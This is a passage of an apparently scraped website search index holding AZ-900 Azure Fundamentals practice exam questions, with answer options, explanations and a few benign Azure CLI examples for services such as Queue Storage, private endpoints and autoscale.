                            Azure Arc\u00a0is a hybrid management service that allows you to manage your servers, Kubernetes clusters, and applications across on-premises, multi-cloud, and edge environments. Some of the benefits of using Azure Arc include consistent management of resources across hybrid environments, improved security and compliance for resources, and increased visibility and control over resources. Centralized billing and cost management for all resources is\u00a0not\u00a0a benefit of using Azure Arc: while Azure provides centralized billing and cost management for resources in the cloud, Azure Arc is focused on managing resources across hybrid environments and does not provide billing or cost management features.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-yes-or-no-in-a-public-cloud-model-you-get-dedicated-hardware-storage-and-network-devices-than-the-other-organizations-or-cloud-tenants","title":"Question 39:\u00a0Yes or No: In a Public Cloud model, you get dedicated hardware, storage, and network devices than the other organizations or cloud \u201ctenants\".","text":"
                            • Yes
                            • No
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-azure-pay-as-you-go-is-an-example-of-which-cloud-expenditure-model","title":"Question 40:\u00a0Azure Pay As you Go is an example of which cloud expenditure model?","text":"
                            • Operational (OpEx)
                            • Capital (CapEx)
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-which-of-the-following-endpoints-for-a-managed-instance-enables-data-access-to-your-managed-instance-from-outside-a-virtual-network","title":"Question 41:\u00a0Which of the following endpoints for a managed instance enables data access to your managed instance from outside a virtual network?","text":"
                            • Hybrid
                            • External
                            • Private
                            • Public

                            Public endpoint for a\u00a0managed instance\u00a0enables data access to your managed instance from outside the\u00a0virtual network. You are able to access your managed instance from multi-tenant Azure services like Power BI, Azure App Service, or an on-premises network. By using the public endpoint on a managed instance, you do not need to use a VPN, which can help avoid VPN throughput issues.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-which-of-the-following-services-can-help-applications-absorb-unexpected-traffic-bursts-which-prevents-servers-from-being-overwhelmed-by-a-sudden-flood-of-requests","title":"Question 42:\u00a0Which of the following services can help applications absorb unexpected traffic bursts, which prevents servers from being overwhelmed by a sudden flood of requests?","text":"
                            • Azure Decouple Storage
                            • Azure Table Storage
                            • Azure Queue Storage
                            • Azure Message Storage

                            Azure Queue Storage\u00a0is a service for storing large numbers of messages. You access messages from anywhere in the world via authenticated calls using HTTP or HTTPS. A queue message can be up to 64 KB in size. A queue may contain millions of messages, up to the total capacity limit of a storage account. Queues are commonly used to create a backlog of work to process asynchronously.
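A minimal sketch, assuming a storage account and credentials already exist (queue, message, and account names are placeholders):

```bash
# Create a queue on an existing storage account (names are hypothetical;
# assumes credentials are available, e.g. via AZURE_STORAGE_KEY).
az storage queue create \
    --name work-items \
    --account-name mystorageaccount

# Enqueue a message that a worker can later dequeue and process.
az storage message put \
    --queue-name work-items \
    --content "process-order-42" \
    --account-name mystorageaccount
```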

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-in-which-scenario-would-you-use-the-business-to-business-b2b-collaboration-feature-in-azure-ad","title":"Question 43:\u00a0In which scenario would you use the Business-to-Business (B2B) collaboration feature in Azure AD?","text":"
                            • Providing internal access to company reports.
                            • Granting external vendors access to a shared project workspaces
                            • Enabling employees to access internal applications.
                            • Allowing customers to sign up for your e-commerce website.

                            Business-to-Business (B2B) collaboration in Azure AD is used to collaborate with users external to your organization, such as vendors or partners. It allows you to securely share resources like documents and applications while maintaining control over access.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-which-of-the-following-best-describes-azure-arc","title":"Question 44:\u00a0Which of the following best describes Azure Arc?","text":"
                            • A platform for building microservices-based applications that run across multiple nodes
                            • A bridge that extends the Azure platform to help you build apps with the flexibility to run across datacenters
                            • A service for analyzing and visualizing large datasets in the cloud
                            • A cloud-based identity and access management service

                            Azure Arc\u00a0is a service from Microsoft that allows organizations to manage and govern their on-premises servers, Kubernetes clusters, and applications using Azure management tools and services. With Azure Arc, customers can use Azure services such as Azure Policy, Azure Security Center, and Azure Monitor to manage their resources across on-premises, multi-cloud, and edge environments. Azure Arc also enables customers to deploy and manage Azure services on-premises or on other clouds using the same tools and APIs as they use in Azure.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-__-is-a-security-framework-that-uses-the-principles-of-explicit-verification-least-privileged-access-and-assuming-breach-to-keep-users-and-data-secure-while-allowing-for-common-scenarios-like-access-to-applications-from-outside-the-network-perimeter","title":"Question 45:\u00a0__ is a security framework that uses the principles of explicit verification, least privileged access, and assuming breach to keep users and data secure while allowing for common scenarios like access to applications from outside the network perimeter.","text":"
                            • Least Trust
                            • No Trust
                            • Zero Trust
                            • Less Trust
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-yes-or-no-it-is-possible-to-have-multiple-subscriptions-inside-a-management-group","title":"Question 46:\u00a0Yes or No: It is possible to have multiple Subscriptions inside a Management Group.","text":"
                            • Yes
                            • No
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-a-_______-endpoint-is-a-network-interface-that-uses-a-private-ip-address-from-your-virtual-network","title":"Question 47: A _______ endpoint is a network interface that uses a private IP address from your virtual network.","text":"
                            • Public
                            • Internal
                            • Private
                            • Hybrid

                            A private endpoint\u00a0is a network interface that uses a private IP address from your virtual network. This network interface connects you privately and securely to a service that's powered by Azure Private Link. By enabling a private endpoint, you're bringing the service into your virtual network.
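A minimal sketch with the Azure CLI, assuming the VNet, subnet, and target storage account already exist (all names and the resource ID are placeholders):

```bash
# Create a private endpoint that maps a storage account's blob service
# into a subnet, so traffic stays on the VNet (all values hypothetical).
az network private-endpoint create \
    --resource-group demo-rg \
    --name demo-pe \
    --vnet-name demo-vnet \
    --subnet default \
    --private-connection-resource-id "/subscriptions/<sub-id>/resourceGroups/demo-rg/providers/Microsoft.Storage/storageAccounts/mystorageaccount" \
    --group-id blob \
    --connection-name demo-pe-conn
```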

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-you-are-the-lead-architect-of-your-organization-one-of-the-teams-has-a-requirement-to-copy-hundreds-of-tbs-of-data-to-azure-storage-in-a-secure-and-efficient-manner-the-data-can-be-ingested-one-time-or-an-ongoing-basis-for-archival-scenarios-which-of-the-following-would-be-a-good-solution-for-this-use-case","title":"Question 48:\u00a0You are the lead architect of your organization. One of the teams has a requirement to copy hundreds of TBs of data to Azure storage in a secure and efficient manner. The data can be ingested one time or an ongoing basis for archival scenarios. Which of the following would be a good solution for this use case?","text":"
                            • Azure Data Lake Storage
                            • Azure Cosmos DB
                            • Azure File Sync
                            • Azure Data Box
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-of-the-following-two-storage-solutions-are-built-to-handle-nosql-data","title":"Question 49:\u00a0Which of the following two storage solutions are built to handle NoSQL data?","text":"
                            • Azure SQL\u00a0Database
                            • Azure Table Storage
                            • Azure NoSQL\u00a0Database
                            • Azure Cosmos DB

                            Azure Table storage\u00a0is a service that stores non-relational structured data (also known as structured NoSQL data) in the cloud, providing a key/attribute store with a schemaless design. Because Table storage is schemaless, it's easy to adapt your data as the needs of your application evolve. Azure Cosmos DB\u00a0is a fully managed NoSQL database for modern app development. Single-digit millisecond response times, and automatic and instant scalability, guarantee speed at any scale.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-which-of-the-following-services-can-host-the-following-type-of-apps-web-apps-api-apps-webjobs-mobile-apps","title":"Question 50:\u00a0Which of the following services can host the following type of apps: Web apps, API apps, WebJobs, Mobile apps","text":"
                            • Azure App Service
                            • Azure App Environment
                            • Azure Bastion
                            • Azure Arc
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-51-yes-or-no-subscriptions-can-be-moved-to-another-management-group-as-well-as-merged-into-one-single-subscription","title":"Question 51:\u00a0Yes or No: Subscriptions can be moved to another Management Group as well as merged into one Single subscription.","text":"
                            • No
                            • Yes

                            Even though subscriptions can be moved to another management group, they cannot be merged into a single subscription.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-52-______-lets-you-extend-your-on-premises-networks-into-the-microsoft-cloud-over-a-private-connection-with-the-help-of-a-connectivity-provider","title":"Question 52:\u00a0______ lets you extend your on-premises networks into the Microsoft cloud over a private connection with the help of a connectivity provider.","text":"
                            • Azure DNS
                            • Azure Sentinel
                            • Azure ExpressRoute
                            • Azure Virtual Network
                            • Azure Firewall
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-53-azure-cosmosdb-is-an-example-of-a-_______-offering","title":"Question 53:\u00a0Azure CosmosDB\u00a0is an example of a _______ offering.","text":"
                            • Software as a Service (SaaS)
                            • Platform as a Service (PaaS)
                            • Infrastructure as a Service (IaaS)
                            • Serverless Computing
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-54-yes-or-no-azure-cosmos-db-is-a-software-as-a-service-saas-offering-from-microsoft-azure","title":"Question 54:\u00a0Yes or No: Azure Cosmos DB is a\u00a0Software as a Service (SaaS)\u00a0offering from Microsoft Azure.","text":"
                            • No, it is a PaaS\u00a0offering.
                            • No, it is an IaaS\u00a0offering.
                            • Yes, it is a SaaS\u00a0offering.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-55-which-of-the-following-is-the-foundation-for-building-enterprise-data-lakes-on-azure-and-is-built-on-top-of-azure-blob-storage","title":"Question 55: Which of the following is the foundation for building enterprise data lakes on Azure AND\u00a0is built on top of Azure Blob storage?","text":"
                            • Azure Data Lake Storage Gen4
                            • Azure Data Lake Storage Gen3
                            • Azure Data Lake Storage Gen1
                            • Azure Data Lake Storage Gen2

                            Azure Data Lake Storage Gen2 is a set of capabilities dedicated to big data analytics, built on\u00a0Azure Blob Storage. Data Lake Storage Gen2 converges the capabilities of\u00a0Azure Data Lake Storage Gen1\u00a0with Azure Blob Storage. For example, Data Lake Storage Gen2 provides file system semantics, file-level security, and scale. Because these capabilities are built on Blob storage, you'll also get low-cost, tiered storage, with high availability/disaster recovery capabilities. Reference: https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-introduction

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-56-someone-in-your-organization-accidentally-deleted-an-important-virtual-machine-that-has-led-to-huge-revenue-losses-your-senior-management-has-tasked-you-with-investigating-who-was-responsible-for-the-deletion-which-azure-service-can-you-leverage-for-this-task","title":"Question 56:\u00a0Someone in your organization accidentally deleted an important Virtual Machine that has led to huge revenue losses. Your senior management has tasked you with investigating who was responsible for the deletion. Which Azure service can you leverage for this task?","text":"
                            • Azure Service Health
                            • Azure Arc
                            • Azure Monitor
                            • Azure Advisor
                            • Azure Event Hubs

                            The correct answer is\u00a0Azure Monitor: its Activity Log records subscription-level events, including who deleted a resource. Log Analytics\u00a0is the tool in the Azure portal that's used to edit and run log queries against data in\u00a0Azure Monitor Logs. You might write a simple query that returns a set of records and then use features of Log Analytics to sort, filter, and analyze them. Or you might write a more advanced query to perform statistical analysis and visualize the results in a chart to identify a particular trend. Whether you work with the results of your queries interactively or use them with other Azure Monitor features, such as log query alerts or workbooks, Log Analytics is the tool that you'll use to write and test them.
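As a hedged illustration, the same investigation can start from the CLI by filtering the subscription's Activity Log for delete operations (the resource group name is a placeholder):

```bash
# List who performed VM delete operations in the last 7 days
# (resource group name is hypothetical).
az monitor activity-log list \
    --resource-group demo-rg \
    --offset 7d \
    --query "[?contains(operationName.value, 'virtualMachines/delete')].{caller:caller, when:eventTimestamp}" \
    --output table
```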

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-57-true-or-false-azure-dns-can-manage-dns-records-for-your-azure-services-but-cannot-provide-dns-for-your-external-resources","title":"Question 57:\u00a0True or False: Azure DNS can manage DNS records for your Azure services, but cannot provide DNS for your external resources.","text":"
                            • False
                            • True

                            Azure DNS can manage DNS records for your Azure services\u00a0and provide DNS for your external resources as well.\u00a0Azure DNS is integrated in the Azure portal and uses the same credentials, support contract, and billing as your other Azure services. DNS billing is based on the number of DNS zones hosted in Azure and on the number of DNS queries received. To learn more about pricing, see\u00a0Azure DNS pricing.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-58-_______-is-a-strategy-that-employs-a-series-of-mechanisms-to-slow-the-advance-of-an-attack-thats-aimed-at-acquiring-unauthorized-access-to-information-each-layer-provides-protection-so-that-if-one-layer-is-breached-a-subsequent-layer-is-already-in-place-to-prevent-further-exposure","title":"Question 58:\u00a0_______\u00a0is a strategy that employs a series of mechanisms to slow the advance of an attack that's aimed at acquiring unauthorized access to information. Each layer provides protection so that if one layer is breached, a subsequent layer is already in place to prevent further exposure.","text":"
                            • Defense in Depth
                            • Defense in Steps
                            • Defense in Layers
                            • Defense in Series
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-59-which-of-the-following-is-not-a-feature-of-azure-monitor","title":"Question 59:\u00a0Which of the following is NOT a feature of Azure Monitor?","text":"
                            • Log Analytics
                            • Database management
                            • Metrics
                            • Alerts
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-60-true-or-false-when-you-cancel-an-azure-subscription-a-resource-lock-can-block-the-subscription-cancellation","title":"Question 60:\u00a0True or False: When you cancel an Azure subscription, a Resource Lock can block the subscription cancellation.","text":"
                            • True
                            • False

                            When you cancel an Azure subscription:

                            • A resource lock doesn't block the subscription cancellation.
                            • Azure preserves your resources by deactivating them instead of immediately deleting them.
                            • Azure only deletes your resources permanently after a waiting period.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-61-yes-or-no-each-virtual-network-can-have-only-one-vpn-gateway","title":"Question 61:\u00a0Yes or No: Each virtual network can have only one VPN gateway.","text":"
                            • No
                            • Yes

                            VPN Gateway\u00a0sends encrypted traffic between an Azure virtual network and an on-premises location over the public Internet. You can also use VPN Gateway to send encrypted traffic between Azure virtual networks over the Microsoft network. A VPN gateway is a specific type of virtual network gateway. Each virtual network can have only one VPN gateway. However, you can create multiple connections to the same VPN gateway. When you create multiple connections to the same VPN gateway, all VPN tunnels share the available gateway bandwidth.

                            When you configure a virtual network gateway, you configure a setting that specifies the gateway type. The gateway type determines how the virtual network gateway will be used and the actions that the gateway takes. The gateway type 'Vpn' specifies that the type of virtual network gateway created is a 'VPN gateway'. This distinguishes it from an ExpressRoute gateway, which uses a different gateway type. A virtual network can have two virtual network gateways; one VPN gateway and one ExpressRoute gateway. For more information, see\u00a0Gateway types.
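A minimal sketch of creating that single VPN gateway, assuming demo-vnet already contains a GatewaySubnet (all names are placeholders; provisioning can take 30+ minutes):

```bash
# Public IP for the gateway, then the VPN gateway itself
# (names are hypothetical; the VNet must have a GatewaySubnet).
az network public-ip create \
    --resource-group demo-rg --name gw-ip --sku Standard

az network vnet-gateway create \
    --resource-group demo-rg \
    --name demo-vpn-gw \
    --vnet demo-vnet \
    --public-ip-address gw-ip \
    --gateway-type Vpn \
    --vpn-type RouteBased \
    --sku VpnGw1
```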

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-62-which-of-the-following-is-a-benefit-of-using-azure-cloud-shell-for-managing-azure-resources","title":"Question 62:\u00a0 Which of the following is a benefit of using Azure Cloud Shell for managing Azure resources?","text":"
                            • It eliminates the need to install and configure command-line interfaces on your local machine
                            • It provides faster access to Azure resources
                            • It offers more advanced features than other Azure management tools
                            • It allows for easier integration with third-party tools and services
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-63-__-is-a-domain-specific-language-dsl-that-uses-declarative-syntax-to-deploy-azure-resources","title":"Question 63:\u00a0__ is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources","text":"
                            • Tricep
                            • Bicep
                            • PHP
                            • HTML
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-64-___-enforcement-is-at-the-center-of-a-zero-trust-architecture","title":"Question 64:\u00a0___ enforcement is at the center of a Zero Trust architecture.","text":"
                            • Network
                            • Devices
                            • Identities
                            • Security policy
                            • Data
                            • Applications

                            Security policy enforcement\u00a0is at the center of a Zero Trust architecture. This includes multi-factor authentication with Conditional Access, which takes into account user account risk, device status, and other criteria and policies that you set.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-65-how-can-you-apply-a-resource-lock-to-an-azure-resource","title":"Question 65:\u00a0How can you apply a resource lock to an Azure resource?","text":"
                            • By using the Azure API\u00a0for RBAC
                            • By configuring a network security group.
                            • By using the Azure portal or Azure PowerShell
                            • By assigning a custom role to the resource.
                            • By creating a new resource group for the resource.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-66-in-azure-which-of-the-following-services-can-be-accessed-through-private-endpoints","title":"Question 66:\u00a0In Azure, which of the following services can be accessed through private endpoints?","text":"
                            • Azure App Service.
                            • Azure Storage accounts.
                            • Azure SQL Database.
                            • All of the above.
                            • Azure Key Vault.

                            Private endpoints can be used to access various Azure services, including Azure Storage accounts, Azure Key Vault, Azure App Service, and Azure SQL Database. By using private endpoints, you can connect to these services from within your virtual network, ensuring that the traffic remains within the Azure backbone network and doesn't traverse the public internet.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-67-which-of-the-following-scenarios-is-a-suitable-use-case-for-applying-a-resource-lock","title":"Question 67:\u00a0Which of the following scenarios is a suitable use case for applying a resource lock?","text":"
                            • Preventing read access to a development virtual machine.
                            • Automating the deployment of resources using templates.
                            • Ensuring a critical storage account is not accidentally deleted.
                            • Restricting network access to an Azure SQL database.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-68-which-of-the-following-best-describes-the-concept-of-immutable-infrastructure-in-the-context-of-iac","title":"Question 68:\u00a0Which of the following best describes the concept of \"immutable infrastructure\" in the context of IaC?","text":"
                            • Infrastructure that is managed through a graphical user interface.
                            • Infrastructure that cannot be changed once deployed.
                            • Infrastructure that is recreated rather than modified in place.
                            • Infrastructure that is stored in a physical data center.

                            Immutable infrastructure refers to the practice of recreating infrastructure components whenever changes are needed rather than modifying them in place. This approach aligns with IaC principles, enhancing consistency and reducing configuration drift.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-69-an-____-in-azure-monitor-monitors-your-telemetry-and-captures-a-signal-to-see-if-the-signal-meets-the-criteria-of-a-preset-condition-if-the-conditions-are-met-an-alert-is-triggered-which-initiates-the-associated-action-group","title":"Question 69:\u00a0A(n) ____ in Azure Monitor monitors your telemetry and captures a signal to see if the signal meets the criteria of a preset condition. If the conditions are met, an alert is triggered, which initiates the associated action group.","text":"
                            • alert rule
                            • preset rule
                            • preset condition
                            • alert condition

                            An\u00a0alert rule\u00a0monitors your telemetry and captures a signal that indicates that something is happening on a specified target. The alert rule captures the signal and checks to see if the signal meets the criteria of the condition. If the conditions are met, an alert is triggered, which initiates the associated action group and updates the state of the alert.
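For illustration, a metric alert rule can be created from the Azure CLI; the scope and action-group IDs below are placeholders:

```bash
# Alert rule: trigger the action group when average CPU exceeds 80%
# (all IDs and names are hypothetical).
az monitor metrics alert create \
    --resource-group demo-rg \
    --name high-cpu-alert \
    --scopes "/subscriptions/<sub-id>/resourceGroups/demo-rg/providers/Microsoft.Compute/virtualMachines/demo-vm" \
    --condition "avg Percentage CPU > 80" \
    --action "/subscriptions/<sub-id>/resourceGroups/demo-rg/providers/microsoft.insights/actionGroups/ops-team"
```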

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-70-as-the-owner-of-a-streaming-platform-deployed-on-azure-you-notice-a-huge-spike-in-traffic-whenever-a-new-web-series-in-released-but-moderate-traffic-otherwise-which-of-the-following-is-a-clear-benefit-of-this-type-of-workload","title":"Question 70:\u00a0As the owner of a streaming platform deployed on Azure, you notice a huge spike in traffic whenever a new web-series in released but moderate traffic otherwise. Which of the following is a clear benefit of this type of workload?","text":"
                            • Load balancing
                            • Elasticity
                            • High availability
                            • High latency

                            Elasticity in this case is the ability to provision additional compute resources when they are needed (spikes) and release them when they are not, reducing costs. Load balancing and high availability are also advantages the streaming platform would enjoy, but elasticity is the option that best describes the workload in the question. Autoscaling is an example of elasticity.
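As an illustration of elasticity, autoscale settings can grow and shrink a VM scale set with demand; all names below are placeholders:

```bash
# Autoscale a VM scale set between 2 and 10 instances
# (resource and setting names are hypothetical).
az monitor autoscale create \
    --resource-group demo-rg \
    --resource demo-vmss \
    --resource-type Microsoft.Compute/virtualMachineScaleSets \
    --name demo-autoscale \
    --min-count 2 --max-count 10 --count 2

# Scale out by 2 instances when average CPU stays above 70% for 5 minutes.
az monitor autoscale rule create \
    --resource-group demo-rg \
    --autoscale-name demo-autoscale \
    --condition "Percentage CPU > 70 avg 5m" \
    --scale out 2
```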

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-71-which-of-the-following-can-repeatedly-deploy-your-infrastructure-throughout-the-development-lifecycle-and-have-confidence-your-resources-are-deployed-in-a-consistent-manner","title":"Question 71:\u00a0Which of the following can repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner?","text":"
                            • Azure Resource Manager templates
                            • The Azure API Management service
                            • Azure Templates
                            • Management groups

                            Azure Resource Manager templates is the correct answer, since templates are idempotent: you can deploy the same template many times and get the same resource types in the same state.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-72-in-the-context-of-infrastructure-as-code-iac-___-are-independent-files-typically-containing-set-of-resources-meant-to-be-deployed-together","title":"Question 72:\u00a0In the context of Infrastructure as Code (IaC), ___\u00a0 are independent files, typically containing set of resources meant to be deployed together.","text":"
                            • Methods
                            • Modules
                            • Units
                            • Functions

                            Modules\u00a0are independent files, typically containing a set of resources meant to be deployed together. Modules allow you to break complex templates into smaller, more manageable sets of code. You can ensure that each module focuses on a specific task and that all modules are reusable for multiple deployments and workloads. Reference: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/considerations/infrastructure-as-code

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-73-___-service-is-available-to-transfer-on-premises-data-to-blob-storage-when-large-datasets-or-network-constraints-make-uploading-data-over-the-wire-unrealistic","title":"Question 73:\u00a0___ service is available to transfer on-premises data to Blob storage when large datasets or network constraints make uploading data over the wire unrealistic.","text":"
                            • Azure Blob Storage
                            • Azure FileSync
                            • Azure Data Factory
                            • Azure Data Box
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-74-which-type-of-resource-lock-allows-you-to-modify-the-resource-but-not-delete-it","title":"Question 74:\u00a0Which type of resource lock allows you to modify the resource, but not delete it?","text":"
                            • CanNotModify lock
                            • Restrict lock
                            • CanNotDelete lock
                            • Read-only lock
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-75-your-colleague-is-looking-for-an-azure-service-that-can-help-them-understand-how-their-applications-are-performing-and-proactively-identify-issues-that-affect-them-and-the-resources-they-depend-on-whats-your-recommendation","title":"Question 75:\u00a0Your colleague is looking for an Azure service that can help them understand how their applications are performing and proactively identify issues that affect them , AND the resources they depend on. What's your recommendation?","text":"
                            • Azure Monitor
                            • Azure Service Health
                            • Azure Advisor
                            • Azure Comprehend
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-76-which-cloud-deployment-model-is-best-suited-for-organizations-with-extremely-strict-data-security-and-compliance-requirements","title":"Question 76:\u00a0Which cloud deployment model is best suited for organizations with extremely strict data security and compliance requirements?","text":"
                            • Community cloud
                            • Private cloud
                            • Public cloud
                            • Hybrid cloud
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-77-if-your-organization-has-many-azure-subscriptions-which-of-the-following-is-useful-to-efficiently-manage-access-policies-and-compliance-for-those-subscriptions","title":"Question 77:\u00a0If your organization has many Azure subscriptions, which of the following is useful to efficiently manage access, policies, and compliance for those subscriptions?","text":"
                            • Azure Subscriptions
                            • Azure Policy
                            • Azure Management Groups
                            • Azure Blueprints
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-78-__-allows-you-to-implement-your-systems-logic-into-readily-available-blocks-of-code-that-can-run-anytime-you-need-to-respond-to-critical-events","title":"Question 78:\u00a0__ allows you to implement your system's logic into readily available blocks of code that can run anytime you need to respond to critical events.","text":"
                            • Azure Cognitive Services
                            • Azure Application Insights
                            • Azure Functions
                            • Azure Kinect DK
                            • Azure Quantum

                            Azure Functions provides \"compute on-demand\" in\u00a0two\u00a0significant ways. First, Azure Functions allows you to implement your system's logic into readily available blocks of code. These code blocks are called \"functions\". Different functions can run anytime you need to respond to critical events. Second, as requests increase, Azure Functions meets the demand with as many resources and function instances as necessary - but only while needed. As requests fall, any extra resources and application instances drop off automatically.
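A minimal sketch of creating a consumption-plan function app from the CLI (resource, storage, and app names are hypothetical, and the app name must be globally unique):

```bash
# Consumption-plan function app: resources scale with demand and you
# pay only while functions run (all names are placeholders).
az functionapp create \
    --resource-group demo-rg \
    --name demo-func-app \
    --storage-account mystorageaccount \
    --consumption-plan-location westeurope \
    --runtime python \
    --functions-version 4
```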

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-79-you-have-managed-a-web-app-that-you-developed-and-deployed-on-prem-for-a-long-time-but-would-now-like-to-move-it-to-azure-and-relieved-of-all-the-manual-administration-and-maintenance-which-of-the-following-buckets-would-be-most-suitable-for-your-use-case","title":"Question 79:\u00a0You have managed a Web App that you developed and deployed On-Prem for a long time, but would now like to move it to Azure and relieved of all the manual administration and maintenance. Which of the following buckets would be most suitable for your use case?","text":"
                            • Platform as a Service (PaaS)
                            • Software as a Service (SaaS)
                            • Infrastructure as a Service (IaaS)
                            • Database as a Service (DaaS)
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-80-microsofts-approach-to-privacy-is-built-on-six-principles-which-of-the-following-is-not-one-of-those-6-principles","title":"Question 80:\u00a0Microsoft's approach to privacy is built on six principles. Which of the following is NOT\u00a0one of those 6 principles?","text":"
                            • Transparency
                            • Security
                            • Strong legal protections
                            • Protection
                            • Control
                            • No content-based targeting

                            Microsoft's approach to privacy is built on six principles:

                            1. Control: Microsoft provides customers with the ability to control their personal data and how it is used.
                            2. Transparency: Microsoft is transparent about the collection, use, and sharing of personal data.
                            3. Security: Microsoft takes strong measures to protect personal data from unauthorized access, disclosure, alteration, and destruction.
                            4. Strong legal protections: Microsoft complies with applicable laws and regulations, including data protection and privacy laws.
                            5. No content-based targeting:\u00a0Microsoft does not use personal data to target advertising to customers based on the content of their communications or files.
                            6. Benefits to the customer:\u00a0Microsoft uses personal data to provide customers with valuable products and services that improve their productivity and overall experience.

                            Protection is NOT\u00a0one of the principles.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-81-in-the-context-of-azure-networking-what-is-the-purpose-of-a-network-security-group-nsg-associated-with-a-private-endpoint","title":"Question 81:\u00a0In the context of Azure networking, what is the purpose of a Network Security Group (NSG) associated with a private endpoint?","text":"
                            • To manage IP address assignments for the private endpoint.
                            • To encrypt data traffic between the private endpoint and the Azure service.
                            • To ensure the availability and uptime of the private endpoint.
                            • To enforce access control rules on inbound and outbound traffic to the private endpoint.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-82-true-or-false-each-zone-is-made-up-of-one-or-more-datacenters-equipped-with-common-power-cooling-and-networking","title":"Question 82:\u00a0True or False: Each zone is made up of one or more datacenters equipped with common power, cooling, and networking.","text":"
                            • False
                            • True

                            Azure Availability Zones are unique physical locations within an Azure region and offer high availability to protect your applications and data from datacenter failures. Each zone is made up of one or more datacenters equipped with\u00a0independent\u00a0power, cooling, and networking.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-83-what-is-the-maximum-number-of-cloud-only-user-accounts-that-can-be-created-in-azure-ad","title":"Question 83:\u00a0What is the maximum number of cloud-only user accounts that can be created in Azure AD?","text":"
                            • 100,000
                            • 500,000
                            • 50,000
                            • 1,000,000

                            The correct answer is\u00a0 1,000,000. Azure AD has the capability to hold up to\u00a01,000,000 cloud-only user accounts. This limit can be extended further by contacting Microsoft support.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-84-your-organization-uses-microsoft-defender-for-cloud-and-you-receive-an-alert-that-suspicious-activity-has-been-detected-on-one-of-your-cloud-resources-what-should-you-do","title":"Question 84:\u00a0Your organization uses Microsoft Defender for Cloud and you receive an alert that suspicious activity has been detected on one of your cloud resources. What should you do?","text":"
                             • Delete the cloud resource to prevent the threat from spreading.
                             • Investigate the alert and take appropriate action to remediate the threat if necessary.
